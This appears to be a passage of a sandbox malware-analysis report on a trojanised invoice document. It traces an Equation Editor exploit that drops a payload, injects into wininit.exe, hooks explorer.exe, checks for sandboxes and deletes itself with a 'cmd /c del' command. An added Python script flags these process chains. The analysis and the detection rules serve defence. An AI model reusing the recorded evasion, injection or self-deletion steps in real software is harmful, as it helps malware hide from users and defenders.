          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008A5485
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0088C5F0
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0087351F
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00874680
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0087E6C1
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00912622
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008F579A
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0087C7BC
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008A57C3
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0090F8EE
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0087C85C
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0089286D
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0091098E
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008729B2
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008869FE
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008F5955
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00923A83
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0091CBA4
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0086FBD7
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008FDBDA
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00897B00
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02551238
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024AE2E9
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024B7353
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024FA37B
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024B2305
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024AF3CF
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024D63DB
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024B3040
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024C905A
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024DD005
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024AE0C6
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02552622
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024BE6C1
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024B4680
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024E57C3
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0253579A
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024BC7BC
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024C1489
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024E5485
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024B351F
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024CC5F0
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02563A83
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024D7B00
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0253DBDA
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024AFBD7
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0255CBA4
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024BC85C
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024D286D
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0254F8EE
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_02535955
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024C69FE
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0255098E
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024B29B2
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024CEE4C
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024E2E2F
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024DDF7C
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024C0F3F
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024BCD5B
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024E0D3B
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0254FDDD
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FE5B0
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000E2D8B
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000E2D90
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FEE3B
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000E9E4B
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000E9E50
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FEF5C
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000E2FB0
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: String function: 008DF970 appears 69 times
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: String function: 0086E2A8 appears 31 times
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: String function: 008B373B appears 185 times
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: String function: 008B3F92 appears 72 times
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: String function: 0086DF5C appears 88 times
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: String function: 024F373B appears 238 times
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: String function: 024F3F92 appears 108 times
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: String function: 024AE2A8 appears 38 times
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: String function: 0251F970 appears 81 times
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: String function: 024ADF5C appears 107 times
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041A350 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041A400 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041A480 NtClose,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041A530 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041A34A NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041A3A3 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041A47A NtClose,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041A52B NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008600C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00860048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00860078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008610D0 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00860060 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008601D4 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0086010C NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00861148 NtOpenThread,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008607AC NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085F8CC NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00861930 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085F938 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FAB8 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FA20 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FA50 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FBE8 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0085FB50 NtCreateKey,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024A00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024A07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249F900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249F9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024A0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024A0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024A0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024A10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024A1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024A010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024A01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249F8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249F938 NtWriteFile,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024A1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FEA0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024A0C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FC90 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_0249FD8C NtDelayExecution,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024A1D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FA350 NtCreateFile,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FA400 NtReadFile,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FA480 NtClose,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FA530 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FA34A NtCreateFile,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FA3A3 NtReadFile,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FA47A NtClose,
          Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FA52B NtAllocateVirtualMemory,
Source: ibefrankzx[1].exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: ibefrankhq4862.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Memory allocated: 76E90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Memory allocated: 76E90000 page execute and read and write
Source: C:\Windows\SysWOW64\wininit.exe | Memory allocated: 76F90000 page execute and read and write
Source: C:\Windows\SysWOW64\wininit.exe | Memory allocated: 76E90000 page execute and read and write
Source: Proforma invoice.doc | ReversingLabs: Detection: 26%
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe
Source: C:\Windows\SysWOW64\wininit.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe'
Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$oforma invoice.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD24B.tmp
Source: classification engine | Classification label: mal100.troj.expl.evad.winDOC@9/8@5/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
Source: explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp | Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: wininit.pdb source: ibefrankhq4862.exe, 00000005.00000002.448740423.0000000000484000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: ibefrankhq4862.exe, wininit.exe
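The process-creation events above are the evidence behind the Sigma hits listed in the overview: EQNEDT32.EXE spawning a dropper out of %AppData%, explorer.exe spawning wininit.exe (which on a healthy host is only ever started by smss.exe), and the final cmd.exe /c del that removes the dropper. The following Python is an added example, not part of the Joe Sandbox report or its rule set. It parses those lines exactly as this page renders them (the Source field and the event name run together) and applies four parent/child rules. The rule names, the list of Office parents and the set of boot-time processes are the example's own choices; the input lines are copied from this report.

```python
import re
from pathlib import PureWindowsPath

# Constructed input: the "Process created" lines of this report, in the form the
# page renders them (the "Source:" value and the event name run together).
REPORT_LINES = [
    r"Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding",
    r"Source: unknownProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding",
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe",
    r"Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exeProcess created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe",
    r"Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wininit.exe C:\Windows\SysWOW64\wininit.exe",
    r"Source: C:\Windows\SysWOW64\wininit.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe'",
]

LINE_RE = re.compile(r"^Source:\s*(?P<parent>.*?)Process created:\s*(?P<rest>.+)$")
# The child image path may contain spaces, so cut at the first ".exe" that is
# followed by whitespace or end of line; whatever follows is the command line.
IMAGE_RE = re.compile(r"^(?P<image>.+?\.exe)(?:\s+(?P<cmdline>.*))?$", re.IGNORECASE)


def parse_process_created(lines):
    """Return a list of (parent_image, child_image, child_cmdline) tuples."""
    events = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        im = IMAGE_RE.match(m.group("rest"))
        if not im:
            continue
        events.append((m.group("parent"), im.group("image"), im.group("cmdline") or ""))
    return events


def basename(path):
    return PureWindowsPath(path).name.lower()


# Hypothetical rule data (example's own): Office parents that should never spawn
# binaries from a user-writable profile, and processes only smss.exe starts.
OFFICE_PARENTS = {"eqnedt32.exe", "winword.exe", "excel.exe", "powerpnt.exe"}
BOOT_PROCESSES = {"wininit.exe", "csrss.exe", "smss.exe"}


def evaluate(events):
    """Apply parent/child rules; returns a list of (rule, parent, child) hits in event order."""
    hits = []
    for parent, child, cmdline in events:
        p, c = basename(parent), basename(child)
        if p == "eqnedt32.exe":                       # Equation Editor never spawns children legitimately
            hits.append(("equation_editor_spawns_process", parent, child))
        if p in OFFICE_PARENTS and "\\appdata\\" in child.lower():
            hits.append(("office_spawns_from_appdata", parent, child))
        if p == "explorer.exe" and c in BOOT_PROCESSES:  # wininit.exe is started by smss.exe, not explorer.exe
            hits.append(("explorer_spawns_boot_process", parent, child))
        if c == "cmd.exe" and re.search(r"/c\s+del\b", cmdline, re.IGNORECASE):
            hits.append(("cmd_delete_after_exec", parent, child))
    return hits


if __name__ == "__main__":
    for hit in evaluate(parse_process_created(REPORT_LINES)):
        print(hit)
```

Four hits come out of the six lines: the two EQNEDT32.EXE rules fire on the same event, the explorer.exe to wininit.exe creation fires the boot-process rule, and the trailing cmd.exe fires the self-deletion rule. The two "unknown"-parent lines (Word and the Equation Editor themselves, started via COM with -Embedding) correctly produce nothing.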

          Data Obfuscation:

.NET source code contains potential unpacker
Source: ibefrankzx[1].exe.2.dr, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: ibefrankhq4862.exe.2.dr, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.0.ibefrankhq4862.exe.13a0000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 4.2.ibefrankhq4862.exe.13a0000.2.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.0.ibefrankhq4862.exe.13a0000.0.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 5.2.ibefrankhq4862.exe.13a0000.5.unpack, Darwin.WindowsForm/MainForm.cs | .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0040E3CE push esi; iretd
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00417C03 push edi; iretd
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0040E419 push ds; ret
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041D4F2 push eax; ret
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041D4FB push eax; ret
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00417C80 push edi; iretd
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041D4A5 push eax; ret
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0041D55C push eax; ret
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024ADFA1 push ecx; ret
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000EE3CE push esi; iretd
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000EE419 push ds; ret
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FD4A5 push eax; ret
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FD4FB push eax; ret
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FD4F2 push eax; ret
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FD55C push eax; ret
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FD7C1 pushfd; iretd
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000F7C03 push edi; iretd
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000F7C80 push edi; iretd
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_000FDD5E push eax; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.04325438005
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe

          Hooking and other Techniques for Hiding and Protection:

Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe | User mode code has changed: module: USER32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8C 0xCE 0xE8
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Process information set: NOOPENFILEERRORBOX (51 identical events)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (3 identical events)
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Process information set: NOOPENFILEERRORBOX (20 identical events)
Source: C:\Windows\SysWOW64\wininit.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match | File source: 4.2.ibefrankhq4862.exe.28bed1c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: ibefrankhq4862.exe PID: 2032, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp | Binary or memory string: SBIEDLL.DLL
Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp | Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
